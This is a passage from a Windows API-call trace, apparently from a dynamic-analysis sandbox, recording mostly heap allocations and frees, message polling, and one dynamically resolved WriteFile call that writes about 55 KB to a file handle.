(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0163.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0163.711] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0163.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0163.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0163.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0163.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0163.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0163.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0163.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0163.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0163.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0163.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0163.714] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0163.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0163.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0163.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0163.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0163.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0163.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0163.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0163.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0163.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0163.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0163.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0163.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0163.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0163.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0163.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0163.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0163.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0163.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0163.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0163.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0163.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0163.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0163.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0163.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0163.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0163.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0163.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0163.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0163.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0163.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0163.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0163.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0163.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0163.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0163.717] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0163.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0163.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0163.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0163.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd840 [0163.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0163.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0163.717] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0163.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0163.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0163.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0163.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0163.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0163.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0163.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0163.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0163.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0163.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0163.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0163.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0163.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0163.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0163.718] WriteFile (in: hFile=0x138, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0xd79a, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0xd79a, lpOverlapped=0x0) returned 1 [0163.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0163.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0163.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0163.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0163.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0163.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0163.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0163.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0163.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0163.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0163.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0163.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0163.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0163.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0163.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0163.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0163.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0163.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0163.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0163.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0163.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0163.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0163.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0163.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0163.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0163.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0163.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0163.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0163.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0163.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0163.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0163.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0163.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0163.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0163.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0163.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0163.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0163.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0163.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0163.725] FreeLibrary (hLibModule=0x75990000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0163.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0163.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0163.726] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0163.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0163.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0163.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0163.726] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0163.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0163.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.726] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0163.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0163.727] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0163.727] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0163.727] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0163.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0163.727] RtlAllocateHeap (HeapHandle=0x8a0000, 